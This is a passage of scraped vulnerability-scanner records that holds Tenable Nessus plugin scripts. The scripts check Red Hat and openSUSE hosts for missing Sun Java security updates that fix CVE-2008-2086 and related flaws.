"Updated java-1.6.0-sun packages that correct several security issues\nare now available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Java Runtime Environment (JRE) contains the software and tools\nthat users need to run applets and applications written using the Java\nprogramming language.\n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute\narbitrary code. (CVE-2008-2086)\n\nAdditionally, these packages fix several other critical\nvulnerabilities. These are summarized in the ", "modified": "2020-06-02T00:00:00", "id": "REDHAT-RHSA-2008-1018.NASL", "href": "https://www.tenable.com/plugins/nessus/40731", "published": "2009-08-24T00:00:00", "title": "RHEL 4 / 5 : java-1.6.0-sun (RHSA-2008:1018)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:1018. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40731);\n script_version (\"1.30\");\n script_cvs_date(\"Date: 2019/10/25 13:36:13\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_bugtraq_id(32620, 32892);\n script_xref(name:\"RHSA\", value:\"2008:1018\");\n\n script_name(english:\"RHEL 4 / 5 : java-1.6.0-sun (RHSA-2008:1018)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-sun packages that correct several security issues\nare now available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Java Runtime Environment (JRE) contains the software and tools\nthat users need to run applets and applications written using the Java\nprogramming language.\n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute\narbitrary code. (CVE-2008-2086)\n\nAdditionally, these packages fix several other critical\nvulnerabilities. These are summarized in the 'Advance notification of\nSecurity Updates for Java SE' from Sun Microsystems.\n\nUsers of java-1.6.0-sun should upgrade to these updated packages,\nwhich correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2086\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5341\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5344\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5360\"\n );\n # http://blogs.sun.com/security/entry/advance_notification_of_security_updates3\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c8d7aabf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:1018\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:1018\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-demo-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-demo-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-devel-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-devel-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-jdbc-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-jdbc-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-plugin-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-src-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-src-1.6.0.11-1jpp.1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-demo-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-demo-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-devel-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-devel-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-jdbc-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-jdbc-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-plugin-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-src-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-src-1.6.0.11-1jpp.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-sun / java-1.6.0-sun-demo / java-1.6.0-sun-devel / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-01T04:20:43", "bulletinFamily": "scanner", "description": "The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "modified": "2020-06-02T00:00:00", "id": "SUSE_11_1_JAVA-1_5_0-SUN-081217.NASL", "href": "https://www.tenable.com/plugins/nessus/40235", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-375)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_5_0-sun-375.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40235);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/10/25 13:36:31\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-375)\");\n script_summary(english:\"Check for the java-1_5_0-sun-375 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=456770\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-alsa-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-devel-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-plugin-1.5.0_update17-1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun / java-1_5_0-sun-alsa / java-1_5_0-sun-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-01T04:46:38", "bulletinFamily": "scanner", "description": "The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "modified": "2020-06-02T00:00:00", "id": "SUSE_JAVA-1_5_0-SUN-5875.NASL", "href": "https://www.tenable.com/plugins/nessus/35305", "published": "2009-01-07T00:00:00", "title": "openSUSE 10 Security Update : java-1_5_0-sun (java-1_5_0-sun-5875)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_5_0-sun-5875.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35305);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2019/10/25 13:36:32\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE 10 Security Update : java-1_5_0-sun (java-1_5_0-sun-5875)\");\n script_summary(english:\"Check for the java-1_5_0-sun-5875 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-alsa-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-demo-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-devel-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-plugin-1.5.0_update17-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_5_0-sun-src-1.5.0_update17-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun / java-1_5_0-sun-alsa / java-1_5_0-sun-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-18T01:17:15", "bulletinFamily": "scanner", "description": "The remote Mac OS X 10.4 host is running a version of Java for Mac OS\nX older than release 9.\n\nThe remote version of this software contains several security\nvulnerabilities. A remote attacker could exploit these issues to\nbypass security restrictions, disclose sensitive information, cause a\ndenial of service, or escalate privileges.", "modified": "2009-07-09T00:00:00", "id": "MACOSX_JAVA_REL9.NASL", "href": "https://www.tenable.com/plugins/nessus/39766", "published": "2009-07-09T00:00:00", "title": "Mac OS X : Java for Mac OS X 10.4 Release 9", "type": "nessus", "sourceData": "#TRUSTED 